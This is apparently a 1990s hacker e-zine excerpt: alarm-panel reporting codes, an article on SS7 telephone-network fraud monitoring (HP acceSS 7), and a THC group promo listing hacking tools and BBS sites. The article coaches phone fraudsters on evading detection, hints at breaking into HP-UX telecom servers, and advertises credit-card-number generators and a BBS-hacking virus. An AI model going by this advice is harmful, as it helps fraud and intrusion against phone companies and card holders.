Bell Circuit Trouble Alarm Reporting Code {349}
Bell Circuit Trouble Restoral Reporting Code {350}
Fire Trouble Alarm Reporting Code {349}
Fire Trouble Restoral Reporting Code {350}
Auxiliary Power Supply Trouble Alarm Reporting Code {349}
Auxiliary Power Supply Trouble Restoral Reporting Code {350}
TLM Trouble Reporting Code {349}
TLM Trouble Delay {370}
TLM Restoral Reporting Code {350}
General System Trouble Reporting Code {349}
General System Trouble Restoral Reporting Code {350}
General System Supervisory Trouble Reporting Code {349}
General System Supervisory Trouble Restoral Reporting Code {350}
Zone Expander Supervisory Trouble Reporting Code {328}
Zone Expander Supervisory Restoral Reporting Code {328}
Periodic Test Transmission Reporting Code {352}
System Test Reporting Code {352}
LINKS 1000 Test Transmission Restoral Code {352}
General Zone Low Battery Alarm Reporting Code {353}
Keypad Lockout Reporting Code {338}
DLS Lead In Reporting Code {351}
DLS Trail Out Reporting Code {351}
Phone Number 1 Failure to Communicate Reporting Code {351}
Phone Number 2 Failure to Communicate Reporting Code {351}
Event Buffer 75% Full Reporting Code {351}
D. SIA Reporting Codes
Reporting codes have a pattern to them. An "A" suffix indicates
an alarm while an "H" indicates a restoration, and many of the different
alarms have the same codes. Furthermore, many use "XX" to indicate to the
central station which zone has been violated or secured. This information
can be used to translate errors from or into SIA format.
The following use BA-XX / BH-XX:
o Delay Zone o Instant Zone
o Interior Zone o Delay HA Zone
o Interior HA Zone o 24 Hr Burg Zone
o 24 Hr Latching Tamper
The following use FA-XX / FH-XX:
o Standard Fire Zone o Delayed Fire Zone
The following use UA-XX / UH-XX:
o 24 Hr Supervisory Buzzer o 24 Hr Supervisory Zone
GA-XX / GH-XX: 24 Hr Gas Zone
KA-XX / KH-XX: 24 Hr Heat Zone
MA-XX / MH-XX: 24 Hr Medical Zone
PA-XX / PH-XX: 24 Hr Panic Zone
QA-XX / QH-XX: 24 Hr Emergency Zone
SA-XX / SH-XX: 24 Hr Sprinkler Zone
WA-XX / WH-XX: 24 Hr Water Zone
ZA-XX / ZH-XX: 24 Hr Freeze Zone
TA-XX: Zone Tamper
TR-XX: Zone Tamper Restoral
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change Presents
CCiTT #7 Monitoring
by
van Hauser
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CCiTT #7 Monitoring
The information presented here is based on data retrieved from :
˛ Hewlett Packard - USA
˛ Deutsche Telekom - Germany
˛ Bell & Bellcore (Bell Communication Research) - USA
˛ Mercury Communications - United Kingdom
What is CCiTT #7
------------------
CCiTT #7 is the newest signaling system, it is also called SS7 (or Common
Channel Signaling System No.7). It uses two channels for communication.
The first is the voice channel (or what ever you are transmitting over it)
and the second is the data channel. This data channels is completely separated
from the voice channel and holds all calling information in it plus has got
the advanced features of caller ID, call forwarding, conference calling,
credit card calls, collect calls etc.
This extra data channel was put in after CCiTT #6, because 1st this disables
the "famous" blueboxing possibility, 2nd it enhances line quality, and 3rd
it expands the possibilities for new features like caller ID etc.
It is used in nearly all west European countries and North America, but now
more and more other countries change to this system as well, like Israel for
example.
Monitoring Systems for CCiTT #7
-------------------------------
As far as I know the following Monitoring Systems are in existence and
available for telecommunication companies :
˛ Bellcore : Davin and NetMavin
˛ Hewlett Packard : HP E4250A, also known as acceSS 7
˛ Unisys : NIRIS Information Platform
˛ Algen : Probe
I won't discuss Unisys and Algen here because they are not used by the
big companies and there are not much data around for them.
So I'll first present some short data about Bellcore's monitoring system
which is only for the sake of completeness and then focus on hardware,
software and history on HP's acceSS 7 in it's own chapter.
˛ Bellcore's monitoring system is based on unix and is programmed in C using
the X11 Unix Window System but can also be run on vt100 terminals and soon
on Macintoshs too. It can run on any workstation which is Unix compactible.
It has got also the possibility to work with data from other Monitoring
Systems like acceSS 7 from HP and also use the C libraries from HP's system.
It's easy to use: mouse support, Window graphic real-time display, zooming.
Interesting Options are for example :
Monitoring calls from a specific telephone number
Automatic Fraud Detection
Multiple simultaneous call traces (up to 100)
Bellcore's Davin and NetMavin is used by Bell and Mercury Telecommunication.
HP's acceSS7 CCiTT #7 Monitoring System
---------------------------------------
˛ A bit history :
This monitoring system, made my Hewlett Packard, made it to the No. 1
monitoring system used on the telecommunication market.
In it's beginning it was only for fault and performance analysis but
then the engineers saw the prospective possibilities and enhanced it.
It's first big success was in October '95 when Deutsche Telekom, Germany's
only phone company, announced the first installation of this new device
in Europe. Later New Zealand's telecom, Finnland's Finnet group
(January '96), Israel's Bezeq (may '96), Bell USA (june 96) were the
major phone companies which installed the acceSS 7 device.
May '95 10 of the 30 world's biggest phone companies used acceSS7, now
(November '96) 20 of those 30 use it.
Even British Telecom, TeleWest, GTE and AT&T Wireless are now using
parts of the acceSS 7 system.
Or as HP put it : "We estimate that more than 90 percent of the CCiTT #7
links that are being monitored are being monitored by
our system."
In June '96 Hewlett Packard announced the new Fraud Management Toolkit.
It made it's first hard-core testing by BellSouth at the Olympics in
Atlanta with an outstanding result.
They also founded the "Alliance to Outfox Phone Fraud" where now more
than 12 big phone companies are working together to work on strategies
to fight the phone fraud.
The success of acceSS7 lies in the general and flexible design, especially
in contrast to the Bellcore's monitoring system which is pretty focused
on Bellcore and Mercury standards and equipment.
It can link into any CCiTT #7 based link and HP also guarantees an
installation time to up to 3 month maximum and is willing to configure
everything to the customer's needs.
˛ The Hardware :
HP's main package are 4 8-way symmetric multiprocessing (SMP)
HP 9000 Model T500 Corporate Business Servers for one link.
Each of those machines can handle up to 800 calls at once.
In august '96 an Ms-Dos based implementation was announced, don't know
if it's available by now.
˛ The Software :
They are running HP-UX, the unix operating system of HP, based
on Sys V 4.0 by AT&T, and using the HP-UX OpenView X-Window system.
Everything is programmed in C, the libraries part of the installation.
The customer can use those libraries to write applets and scripts of
their own to meet their needs. HP has also a service team and offers
training for that.
The basis of the software is the data collection kit which generates a
"call detail record" (CDR) for every call.
This record can then be used by applets written by HP or the company
to extract any statistical data they want.
HP offers such toolkits for billing, billing-control, traffic-control and
of course fraud detection.
Of course Fraud Detection is not the main point of CCiTT #7 Monitoring.
Originally it's goal was fault and performance analysis but then they
found out that the data gathered could be used for nearly anything.
So today it's more gathering traffic statistics for network planning,
optimizing, error controlling & detecting, and market decisions - but
fraud detection is an important part. And it's the information about this
detection system which could be interesting for you so here's the
description :
˛ The Fraud Detection Toolkit :
The Automatic Fraud Detection is based on pattern matching and scenarios.
Patterns must first be measured for each every communication network/area.
Scenarios are known patterns of fraud types.
Everything which is out of the normal pattern or fits into a scenario
triggers an alarm.
Out-of-Pattern are :
identify calls of long duration
repeated calls to a particular dialed number from the same area of origin
repeated calls from the same area of origin to different numbers
long/many calls from an un-billable number
dialing special numbers
dialing many toll free numbers
Some Scenarios include :
calls to high fraud destinations
suspicious use of call forwarding
many long distance calls from one origin
many calls, especially LD calls, from a public phone
A triggered alarm gets a priority and is shown at the screen of an
operator of the company's Customer Service Center. If a number continues
to be out of pattern or fits into a scenario it will get an higher priority.
According to the priority the operator can select actions like tracing,
disconnecting, monitoring the origin number and more.
Note that there is an exception list of known legitimate users/companies!
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX \
XXXXXXXXXXXXXXXX \
XXXXXXXXXXXXXXXX \ Out-of- --> XXXXXXXX \ Continues --> XX
XXXXXXXXXXXXXXXX - Pattern/ --> XXXXXXXX - Out-of-Pattern --> XX
XXXXXXXXXXXXXXXX / Scenario XXXXXXXX / or Scenario
XXXXXXXXXXXXXXXX / or Manual
XXXXXXXXXXXXXXXX / Investigation
XXXXXXXXXXXXXXXX
Calls going Monitoring Alarms of Continued FRAUD
though Monitoring system Monitoring Out-of-Pattern CASES
system Analyzing system or Scenario or
Manual Investigation
˛ Where are the installations of HP's acceSS 7 systems
I know only a few so here we go. Read the final words on why that might
be interesting to know :)
Deutsche Telekom Germany :
Links in Frankfurt, Duesseldorf, Stuttgart and Nuernberg
Control Centers in Frankfurt and Bamberg.
Bell USA : Control Center in Philadelphia, another should be in Atlanta
Bezeq Israel : 21 links on key network hubs
Control Center in Tel Aviv
FINAL WORDS
-----------
Some information in this article was previously published in the
THC Magazine #1 (February '96). I updated the information, wrote many
things more detailed and found out much more about the system, so this
article grew by 100% - that it is still 10 kb long (or better to say "short")
shows the lack of information going around. I obtained some sensitive data
and press releases and wrote them all into this concentrated article.
Note that the system from HP runs on HP-UX. And for example in Germany,
all Deutsche Telekom unix servers are connected (of course with firewalls)
and have got also gateways to the internet (of course also firewalled).
But for Hackers, HP stands for Hopeless Problems in regards to security.
There are enough bugs in the software to penetrate any HP-UX server and I
know that even the HP center in Palo Alto got hacked several times.
Maybe it's possible for the really elite hackers to penetrate the systems
(which I won't hope for them - of course! - *grin*) - so watch out ...
It is very important that you - if you are doing phone fraud - are aware
of this system. Since the installation of the acceSS 7 here in Germany
about 50 guys got busted for blueboxing, and our Telekom has just reported
the biggest fraudsters to the police. If you are living in Germany and have
a digital line then stop blueboxing immediately! Even before this system
our Telekom has logged everything to fraud sensitive numbers! From the data
of a busted friend we can see that the begin of the monitoring records is
dated may '95 and he was busted October '96 ... If you blueboxed a lot
during that period then encrypt your data and keep a low profile!
These words are targeted mainly to german readers but everybody doing phone
fraud via a phone company which uses acceSS 7 will get into deep trouble soon
if he does the fraud extensively.
Have fun guys, don't get caught ...
van Hauser (vh@campus.de & vh@insecurity.org)
Type Bits/KeyID Date User ID
pub 1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCU4kAlQMFEDJ2gzNAf3b9d/IP1QEB
5DwD+gJRh6m4h0fVgpQJkOiuQD68lV5w8C0F5R3jk/o6Pollaf7gtVhG8BGGo5/7
/yiH40gujc82rJdmihwcKuZQtwt8X28VN8uy56SCpXD5wjjOZpq0t0qSXmhgunZ0
m7xv7R4mWRzFclsgQCMwXNgp4sXgw64bVm8FhEdkrVSO8iTyiQCVAwUQMkMhCspv
3AI7GIx9AQFstAP+Jrg7V06FGV/sTzegFNoaSyOItkvXjctzFsXuBfta2M7EzPX3
UR3kM4/W4xE70H4XmMOJ9RmTzs+MuhSq8BtGQtYaJqGjxe/ldbvGOXRxR1rBJAKS
yDQYu0VJ/Ae8yuJcMS312jqwg8OLgYnQaqEoaRM4HEiB+hgDRqnFKpDxkhSJAJUD
BRAyQx8E5y7IvlL6xvEBAQ+bA/9baK7f3M9F5n4aASy04WHOreUNpGQ8DXgtMVq7
KVdXMIWjURsboR+wt5eJTPeL00lHS5eqmZlNzGV9hWtzAr20qrKLmvE20Ke4VPB0
a/tWXNUdvLnk4ENbTBFfMMdnlDo3hSThSMQ7yZ9UEYgighKu6l2fG5UG6D+kXFLy
iIvvlA==
=nX2w
-----END PGP PUBLIC KEY BLOCK-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change presents
Reviews and Miscellany
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This is a new section which will appear in all future installments of this
magazine. This issue contains some information about the THC hacking
utilities.
--------------------------
THC - The Hacker's Choice
THC was founded October 95 and made it in only one year to the top
hacking/phreaking groups of the world.
Currently working together with UCF and UPG in regards of unix
and telecom hacking plus information exchange and distribution.
The most successful tools of THC include :
THC-SCAN v1.0 - a tone and carrier scanner which replaces the old
Toneloc with many more and new options
LOGIN HACKER v1.1 - the first flexible script language based hacking
tool ever to be in existence
T-CRED v1.9 - our successful competitor for credit card calculation
which makes time hard for the Credit Master v4
RA BBS HACKING TOOLS #1 + #2
- wonderful tools, including a hacking virus,
to hack a Remote Access BBS
GENERAL DIALER v1.0 - the only bluebox dialer which works with the
GUS soundcard (and only with the GUS ;)
THC-MAGAZINE #1 + #2 - The magazines of THC, with themes about
blueboxing, hardware, hacking, virii and anarchy.
... plus about 5 smaller releases.
Global Distribution Sites
----------------------+----------------+------------+-------------
BOARD NAME | AC/NUMBER | COUNTRY | SYSOP
----------------------+----------------+------------+-------------
L.o.r.E BBS [HQ] | +49-69-823282 | GERMANY | van Hauser
| | Login:THC | Passwd:THC
ARRESTED DEVELOPMENT | +31-77-3547477 | HOLLAND | OMEGA
ViRUS POLYTECHNiQUES | +27-1-1953-5414| S. AFRiCA | RADiX
TWiLiGHT ZONE | +54-768-8639 | ARGENTiNiA | CARNiVORO
RUNESTONE | +1-203-585-9638| USA | MERCENARY
UNDERWORLD_1996.COM | +1-514-683-1894| CANADA | RATPACK
PHREAK ASYLUM | +1-905-823-5532| CANADA | NETHAKD
---------------+------+----------------+------------+-+-----------
SiTE TYPE | iNET ADDRESS | COMMENT
---------------+--------------------------------------+-----------
WORLD WiDE WEB| http://www.insecurity.org |by:Celtic
WORLD WiDE WEB| http://www.paranoia.com/pub/zines/THC|by:KevinX
---------------+--------------------------------------+-----------
FTP SiTE | ftp://ftp.insecurity.org |by:Celtic
FTP SiTE | ftp://ftp.paranoia.com /pub/zines/THC|by:KevinX
---------------+--------------------------------------+-----------
There are about 5 more sites but until now they aren't
public because they are still tested if they are stable
To contact write to vh@campus.de or vh@insecurity.org
Type Bits/KeyID Date User ID
pub 1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: Requires PGP version 2.6.x or later!
mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCU4kAlQMFEDJ2gzNAf3b9d/IP1QEB
5DwD+gJRh6m4h0fVgpQJkOiuQD68lV5w8C0F5R3jk/o6Pollaf7gtVhG8BGGo5/7
/yiH40gujc82rJdmihwcKuZQtwt8X28VN8uy56SCpXD5wjjOZpq0t0qSXmhgunZ0
m7xv7R4mWRzFclsgQCMwXNgp4sXgw64bVm8FhEdkrVSO8iTyiQCVAwUQMkMhCspv
3AI7GIx9AQFstAP+Jrg7V06FGV/sTzegFNoaSyOItkvXjctzFsXuBfta2M7EzPX3
UR3kM4/W4xE70H4XmMOJ9RmTzs+MuhSq8BtGQtYaJqGjxe/ldbvGOXRxR1rBJAKS
yDQYu0VJ/Ae8yuJcMS312jqwg8OLgYnQaqEoaRM4HEiB+hgDRqnFKpDxkhSJAJUD
BRAyQx8E5y7IvlL6xvEBAQ+bA/9baK7f3M9F5n4aASy04WHOreUNpGQ8DXgtMVq7
KVdXMIWjURsboR+wt5eJTPeL00lHS5eqmZlNzGV9hWtzAr20qrKLmvE20Ke4VPB0
a/tWXNUdvLnk4ENbTBFfMMdnlDo3hSThSMQ7yZ9UEYgighKu6l2fG5UG6D+kXFLy
iIvvlA==
=nX2w
-----END PGP PUBLIC KEY BLOCK-----
------------------------------------------------------------------------------
COMING EASTER WEEKEND 1997 TO THE LAKEWOOD SHERATON IN COLORADO
--+ BUNNYCON '97 +--
(Stay tuned for more details)